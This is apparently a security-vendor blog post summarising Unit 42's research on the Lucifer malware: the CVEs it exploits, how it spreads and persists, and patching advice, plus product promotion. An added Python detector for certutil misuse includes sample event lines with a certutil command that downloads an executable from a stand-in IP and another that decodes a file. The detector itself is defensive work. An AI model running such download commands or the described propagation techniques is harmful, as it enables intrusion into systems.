Lucifer Malware Targets Windows Systems

New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. This new variant initially attempts to infect devices by bombarding them with exploits, in the hope that one of a number of unpatched vulnerabilities is present.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software is strongly advised.”

In a blog post, the researchers said the latest variant of Lucifer was discovered on May 29 while they were investigating exploitation of CVE-2019-9081, a bug in the Laravel Framework that can be exploited to achieve remote code execution. Many other vulnerabilities are being exploited as well, including those in Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle WebLogic (CVE-2017-10271), and ThinkPHP (CVE-2018-20062), alongside the Laravel framework bug (CVE-2019-9081) itself, among others.

How Lucifer Malware Infects Targets

After successfully exploiting the vulnerability, or gaining access through credential stuffing, the attacker connects to the command-and-control (C2) server to execute arbitrary commands on the vulnerable device, including launching TCP, UDP, or HTTP denial-of-service attacks. The malware may also spread to new targets by brute-forcing IPC, WMI, SMB, and FTP, as well as through MSSQL, RPC, and network sharing.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If the SMB protocol is left open, Lucifer then runs several exploits and backdoors to establish persistence, including EternalBlue, EternalRomance, and DoublePulsar. Researchers say Lucifer also attempts to evade detection and reverse engineering with anti-sandbox capability and enhanced checks for device drivers, DLLs, and virtual devices.
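A defensive illustration of the certutil detail above, written for this page rather than taken from the Syxsense post or Unit 42's report: a small Python heuristic that flags certutil being launched as a downloader or decoder in process-creation events, while leaving a legitimate certificate-verification use alone. The event lines, host names, users and URL are constructed samples, and the simplified key=value layout stands in for real Sysmon or EDR telemetry.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (hypothetical hosts, users and
# URL) in a simplified key=value layout; not real telemetry.
SAMPLE_EVENTS = [
    'Host=WS-01 User=CORP\\alice Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil -urlcache -split -f http://198.51.100.7/x.exe C:\\Users\\Public\\x.exe"',
    'Host=WS-02 User=CORP\\bob Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil -verify -urlfetch server.cer"',
    'Host=WS-03 User=CORP\\carol Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil -decode update.b64 update.exe"',
    'Host=SRV-01 User=SYSTEM Image=C:\\Windows\\System32\\svchost.exe '
    'CommandLine="svchost.exe -k netsvcs"',
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into fields; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def classify_certutil(fields: Dict[str, str]) -> List[str]:
    """Return why a certutil launch looks like misuse (empty list if benign)."""
    # Legitimate admin uses such as '-verify -urlfetch' are deliberately not flagged.
    if not fields.get("Image", "").lower().endswith("\\certutil.exe"):
        return []
    cmdline = fields.get("CommandLine", "")
    args = cmdline.lower().split()
    reasons = []
    if "-urlcache" in args and URL_RE.search(cmdline):
        reasons.append("used as a downloader (-urlcache with a remote URL)")
    if "-decode" in args or "-decodehex" in args:
        reasons.append("used to decode an encoded file to disk")
    return reasons


def scan_events(lines: List[str]) -> List[dict]:
    """Run the heuristic over every event and collect host, user and reasons."""
    hits = []
    for fields in map(parse_event, lines):
        reasons = classify_certutil(fields)
        if reasons:
            hits.append({"host": fields.get("Host"), "user": fields.get("User"),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['host']} ({hit['user']}): {'; '.join(hit['reasons'])}")
```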

Researchers discovered two versions of the malware: one launched on May 29 and another that “wreaked havoc” on June 11. The malware's developer refers to it as Satan DDoS, but since other malware families already use that name, the Palo Alto researchers decided “Lucifer” was more fitting.

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, the researchers recommend that enterprises protect themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across an entire environment, whether on-premises or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, will ensure that organizations are not affected by rising ransomware and other malware events.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.